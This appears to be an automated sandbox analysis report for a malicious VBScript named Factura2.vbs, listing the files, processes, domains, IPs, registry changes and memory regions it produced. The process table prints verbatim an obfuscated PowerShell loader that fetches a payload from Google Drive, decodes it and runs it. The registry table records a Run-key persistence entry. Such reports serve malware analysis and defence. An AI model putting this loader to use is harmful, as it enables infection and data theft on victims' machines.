Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Factura2.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg0c4grn.x0c.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxhyeiht.4sr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qfwglr.siy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Merogastrula.Bes
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function
Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical,
$Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn
'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs
Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary
Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0
Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar
a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari
BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond
r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne
,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej
MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn
' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat
sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan
(Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg
onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee
malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh
ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr
UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor
heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr
allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched.
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can
e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde.
Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt
Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan
(Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs
odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl
PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro
anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn
'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg
Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko=
Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste
') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp
$Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$
CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan
(Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t
Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa
err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner
RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo
: Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve
roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf
Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori
DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn
ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro
orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa
tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout
');Saprophagan $Superincumbent163;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function
Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical,
$Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn
'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs
Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary
Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0
Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar
a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari
BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond
r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne
,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej
MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn
' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat
sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan
(Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg
onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee
malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh
ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr
UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor
heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr
allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched.
B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can
e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde.
Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt
Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan
(Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs
odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl
PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro
anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn
'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg
Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko=
Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste
') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp
$Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$
CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan
(Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t
Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa
err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner
RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo
: Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve
roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf
Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori
DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn
ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro
orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa
tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout
');Saprophagan $Superincumbent163;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\newfile\newfile.exe
|
"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.googPb
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.cash4cars.nz
|
114.142.162.17
|
||
|
drive.google.com
|
64.233.185.138
|
||
|
drive.usercontent.google.com
|
74.125.138.132
|
||
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
114.142.162.17
|
mail.cash4cars.nz
|
Australia
|
||
|
74.125.138.132
|
drive.usercontent.google.com
|
United States
|
||
|
64.233.185.138
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
newfile
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
Zvpebfbsg.Jvaqbjf.Rkcybere
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
|
HRZR_PGYFRFFVBA
|
There are 25 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
62C1000
|
trusted library allocation
|
page read and write
|
|
|
|
24551000
|
trusted library allocation
|
page read and write
|
|
|
|
245A1000
|
trusted library allocation
|
page read and write
|
|
|
|
243B8200000
|
trusted library allocation
|
page read and write
|
|
|
|
CA31000
|
direct allocation
|
page execute and read and write
|
|
|
|
7441000
|
remote allocation
|
page execute and read and write
|
|
|
|
8EA0000
|
direct allocation
|
page execute and read and write
|
|
|
|
C031000
|
direct allocation
|
page execute and read and write
|
||
|
5C4B6FF000
|
stack
|
page read and write
|
||
|
1EA79089000
|
heap
|
page read and write
|
||
|
7FFD34952000
|
trusted library allocation
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
243A89F8000
|
trusted library allocation
|
page read and write
|
||
|
1EA79079000
|
heap
|
page read and write
|
||
|
1EA7908E000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
1EA792CF000
|
heap
|
page read and write
|
||
|
243A9F64000
|
trusted library allocation
|
page read and write
|
||
|
2FDC000
|
stack
|
page read and write
|
||
|
9BD85FB000
|
stack
|
page read and write
|
||
|
1EA791DB000
|
heap
|
page read and write
|
||
|
1EA792AD000
|
heap
|
page read and write
|
||
|
243C0A00000
|
heap
|
page read and write
|
||
|
1EA79411000
|
heap
|
page read and write
|
||
|
26B8F000
|
trusted library allocation
|
page read and write
|
||
|
243A80A6000
|
heap
|
page read and write
|
||
|
1EA790A1000
|
heap
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
A231000
|
direct allocation
|
page execute and read and write
|
||
|
26B60000
|
trusted library allocation
|
page read and write
|
||
|
8C7E000
|
stack
|
page read and write
|
||
|
27530000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA7919A000
|
heap
|
page read and write
|
||
|
9BD7FFE000
|
stack
|
page read and write
|
||
|
1FEC6480000
|
heap
|
page read and write
|
||
|
8BB0000
|
direct allocation
|
page read and write
|
||
|
8960000
|
heap
|
page read and write
|
||
|
3434000
|
heap
|
page read and write
|
||
|
1EA79419000
|
heap
|
page read and write
|
||
|
243B819F000
|
trusted library allocation
|
page read and write
|
||
|
243A6860000
|
trusted library allocation
|
page read and write
|
||
|
4E5E000
|
stack
|
page read and write
|
||
|
7DF0000
|
trusted library allocation
|
page read and write
|
||
|
243A9F97000
|
trusted library allocation
|
page read and write
|
||
|
1EA7922D000
|
heap
|
page read and write
|
||
|
1EA7946E000
|
heap
|
page read and write
|
||
|
1EA79611000
|
heap
|
